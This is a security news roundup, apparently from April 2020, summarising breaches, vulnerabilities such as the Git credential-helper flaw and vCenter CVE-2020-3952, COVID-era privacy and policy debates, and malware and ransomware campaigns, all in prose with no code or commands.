Table of Contents

  1. Breaches
    1. New York State Investigates Network Hack
  2. Vulnerabilities
    1. Malicious URLs may cause Git to present stored credentials to the wrong server
    2. Exploit for Zoom Windows zero-day being sold for $500,000
    3. OneTone Vulnerability Leads to JavaScript Cookie Hijacking
    4. Microsoft Office April security updates fix critical RCE bugs
    5. Unpatched High-Severity Vulnerability in Widget Settings Importer/Exporter Plugin
    6. TikTok Vulnerability Enables Hackers to Show Users Fake Videos
    7. Multiple fiber routers are being compromised by botnets using 0-day
    8. What’s a 10? Pwning vCenter with CVE-2020-3952
  3. Privacy
    1. Mass surveillance alone will not save us from coronavirus
    2. Netzpolitik response to COVID-19 contact tracing
  4. Politics
    1. COVID-19 Has United Cybersecurity Experts, But Will That Unity Survive the Pandemic?
    2. Guidance on the North Korean Cyber Threat
    3. China to ban online gaming, chatting with foreigners outside Great Firewall
  5. Malware
    1. Lokibot with AutoIt Obfuscator + Frenchy Shellcode
    2. Lampion malware: what it is, how it works and how to prevent it
    3. Cyber security researchers uncover hidden backdoors and secret commands in 12,000 Android apps
    4. Coronavirus Update App Leads to Project Spy Android and iOS Spyware
    5. Multistage FreeDom Loader Used to Spread AZORult and NanoCore RAT
  6. Ransomware
    1. Nemty Ransomware shuts down public RaaS operation, goes private

Breaches

New York State Investigates Network Hack

In January, hackers compromised portions of the New York state government's computer network by taking advantage of an unpatched vulnerability in Citrix enterprise software, according to the Wall Street Journal. While the New York State Office of Information Technology Services discovered the hacking incident on Jan. 28, officials did not disclose the breach until Monday, after the Journal and other publications asked about it. The attack disabled some state agency information systems and took nearly a month to resolve, according to the Albany Times Union.

Vulnerabilities

Malicious URLs may cause Git to present stored credentials to the wrong server

Git uses external "credential helper" programs to store and retrieve passwords or other credentials from secure storage provided by the operating system. Specially-crafted URLs that contain an encoded newline can inject unintended values into the credential helper protocol stream, causing the credential helper to retrieve the password for one server (e.g., good.example.com) for an HTTP request being made to another server (e.g., evil.example.com), resulting in credentials for the former being sent to the latter. There are no restrictions on the relationship between the two, meaning that an attacker can craft a URL that will present stored credentials for any host to a host of their choosing.

Exploit for Zoom Windows zero-day being sold for $500,000

An exploit for a zero-day remote code execution vulnerability affecting the Zoom Windows client is currently being sold for $500,000, together with one designed to abused a bug in the video conferencing platform's macOS client. While the exploits and their source codes aren't yet public, sources familiar with the matter with experience on the zero-day exploit market "have been contacted by exploit brokers offering them for sale" as Motherboard first reported.

OneTone Vulnerability Leads to JavaScript Cookie Hijacking

A vulnerability in the discontinued WordPress theme OneTone has been added to an ongoing campaign that is targeting vulnerable WordPress websites and causes malicious redirects through domains like ischeck[.]xyz. This specific wave uses the XSS vulnerability to inject malicious JavaScript and redirect visitors to the attacker's landing page. The malware also detects and leverages existing admin user sessions to create a new admin user for later use as a backdoor.

Microsoft Office April security updates fix critical RCE bugs

Microsoft released the April 2020 Office security updates on April 14, 2020, with a total of 55 security updates and 5 cumulative updates for 7 different products, and patching 5 critical bugs allowing attackers to run scripts as the current user and remotely execute arbitrary code on unpatched systems. Redmond also published the April 2020 Patch Tuesday security updates, with security updates for 113 vulnerabilities, 15 of them being rated as Critical and 93 as Important. Microsoft also patched three zero-day vulnerabilities yesterday, with two of them actively exploited in the wild.

Unpatched High-Severity Vulnerability in Widget Settings Importer/Exporter Plugin

On March 12, 2020, Wordfence team discovered a stored Cross-Site Scripting (XSS) vulnerability in Widget Settings Importer/Exporter, a WordPress plugin with over 40,000 installations. This flaw allowed an authenticated attacker with minimal, subscriber-level permissions to import and activate custom widgets containing arbitrary JavaScript into a site with the plugin installed. Since the vendor did not send a response they decided to do full disclosure and the plugin has been removed from WordPress repository.

TikTok Vulnerability Enables Hackers to Show Users Fake Videos

Two researchers made it appear popular TikTok accounts posted misleading content by taking advantage of a lack of TLS encryption on the service. TikTok, a Chinese video-sharing social networking service, has been delivering video and other media without TLS/SSL encryption, which means it may be possible for someone to tamper with the content, researchers say.

Multiple fiber routers are being compromised by botnets using 0-day

360 Netlab has written a blog post documenting the new 0-day exploit being used to spread the Moobot botnet using Netlink GPON router remote command execution vulnerability.

What’s a 10? Pwning vCenter with CVE-2020-3952

Last Thursday, VMware published a security advisory for CVE-2020-3952, describing a "sensitive information disclosure vulnerability in the VMware Directory Service (vmdir)". It's a pretty terse advisory, and it doesn't go into much more detail than that, besides stating that any vCenter Server v6.7 that has been upgraded from a previous version is vulnerable. What's striking about this advisory is that the vulnerability got a CVSS score of 10.0 - as high as this score can go. The vulnerability allows a malicious actor with network access to a vCenter Server LDAP service to gain full control over the vCenter. An attacker can create a full privileged user on the vCenter Directory, which gives him full control over the vMware deployment.

Privacy

Mass surveillance alone will not save us from coronavirus

As the pattern-shattering truth of our new lives drains heavy - as coronavirus rends routines, raids our wellbeing, and whiplashes us between anxiety and fear - we should not look to mass digital surveillance to bring us back to normal. Now, the government rummages through this enormous database in broad daylight, this time to track the spread of COVID-19. Privacy advocates around the world have sounded the alarm. This month, more than 100 civil and digital rights organizations urged that any government's coronavirus-targeted surveillance mechanisms respect human rights. The groups, which included Privacy International, Human Rights Watch, Open Rights Group, and the Chilean nonprofit Derechos Digitales, wrote in a joint letter: "Technology can and should play an important role during this effort to save lives, such as to spread public health messages and increase access to health care. However, an increase in state digital surveillance powers, such as obtaining access to mobile phone location data, threatens privacy, freedom of expression and freedom of association, in ways that could violate rights and degrade trust in public authorities - undermining the effectiveness of any public health response."

Netzpolitik response to COVID-19 contact tracing

Netzpolitik has written a series of posts in german in response to the contact tracing measures purposed by Apple and Google and implemented independently by several governments.

Politics

COVID-19 Has United Cybersecurity Experts, But Will That Unity Survive the Pandemic?

The Coronavirus has prompted thousands of information security professionals to volunteer their skills in upstart collaborative efforts aimed at frustrating cybercriminals who are seeking to exploit the crisis for financial gain. Whether it's helping hospitals avoid becoming the next ransomware victim or kneecapping new COVID-19-themed scam websites, these nascent partnerships may well end up saving lives. But can this unprecedented level of collaboration survive the pandemic? At least three major industry groups are working to counter the latest cyber threats and scams. Among the largest in terms of contributors is the COVID-19 Cyber Threat Coalition (CTC), which comprises rough 3,000 security professionals who are collecting, vetting and sharing new intelligence about new cyber threats.

Guidance on the North Korean Cyber Threat

The U.S. Departments of State, the Treasury, and Homeland Security, and the Federal Bureau of Investigation are issuing this advisory as a comprehensive resource on the North Korean cyber threat for the international community, network defenders, and the public. The advisory highlights the cyber threat posed by North Korea - formally known as the Democratic People's Republic of Korea (DPRK) - and provides recommended steps to mitigate the threat. The U.S. Department of State says in a DPRK Cyber Threat Advisory also issued today that it will reward any information on DPRK hackers' cyber activity, including past or ongoing operations, with up to $5 million if it leads to the identification or location of North Korean actors, or the disruption of DPRK-related illicit activities.

China to ban online gaming, chatting with foreigners outside Great Firewall

After blocking a popular Nintendo game "Animal Crossing," the Chinese Communist Party (CCP) is taking its political censorship to the extreme by disconnecting Chinese online gamers from their guildmates outside China. On April 10, China banned the popular social simulation video game in which gamers can create a home and interact with cute animal villagers, owing to Hong Kong pro-democracy activist Joshua Wong revealing a customized scene in the game which reads "Free Hong Kong" and mocks Chinese leader Xi Jinping. Several other players were also found leveraging the game to vent their discontent with the CCP and making satirical content related to the CCP's failure to tackle the virus.

Malware

Lokibot with AutoIt Obfuscator + Frenchy Shellcode

During the first week of March, Morphisec intercepted and prevented an advanced Lokibot delivery campaign on some of its customers in the financial sector. While Lokibot has been lately reported to be delivered via impersonation of a known game launcher, previously it was also delivered through advanced AutoIt obfuscated Frenchy shellcode. In the campaign Morphisec identified, the AutoIt+Frenchy shellcode is back and stronger than ever. This post dives deeper into the technical details while pointing out the innovative additions to the campaign.

Lampion malware: what it is, how it works and how to prevent it

The Lampion malware is spread through emails containing a link that downloads a .zip file with malicious files in it. It's a banking Trojan: criminals developed it to steal information related to banking portals from the victim's devices or make fraudulent transactions. This form of malware is a big challenge from the banking security team's point-of-view, as the accesses are performed through the victim's device - a trusted device.

Cyber security researchers uncover hidden backdoors and secret commands in 12,000 Android apps

The use of mobile apps is a part of our daily routine, and anyone using a smartphone has downloaded and installed a variety of them on his device, be it a game, delivery or streaming app. While most of these apps appear harmless to a typical user, researchers from Ohio State University, New York University and CISPA Helmholtz Center for Information Security have analyzed the top 150,000 Android apps, uncovering hidden backdoors and suspicious behavior in 12,706.

Coronavirus Update App Leads to Project Spy Android and iOS Spyware

Trendmicro discovered a potential cyberespionage campaign, which was named Project Spy, that infects Android and iOS devices with spyware. Project Spy uses the ongoing coronavirus pandemic as a lure, posing as an app called Coronavirus Updates. Researchers also found similarities in two older samples disguised as a Google service and, subsequently, as a music app after further investigation.

Multistage FreeDom Loader Used to Spread AZORult and NanoCore RAT

In March 2020, ThreatLabz observed several Microsoft Office PowerPoint files being used in the wild by a threat actor to spread AZORult and NanoCore RAT. The malicious files in this campaign used an interesting payload delivery method that distinguishes it from the common malware delivery methods observed on a daily basis. The infection chain is modular, with multiple stages involved before the final payload is executed on the machine.

Ransomware

Nemty Ransomware shuts down public RaaS operation, goes private

The Nemty Ransomware is shutting down its public Ransomware-as-a-Service (RaaS) operation and switching to an exclusive private operation where affiliates are hand-selected for their expertise. Nemty has historically been a public RaaS, which is a service where ransomware operators are in charge of developing the ransomware and payment site, and affiliates join to distribute and infect victims. As part of this arrangement, the ransomware operators receive a 30% cut and an affiliate receives 70% of the ransom payments they brought in.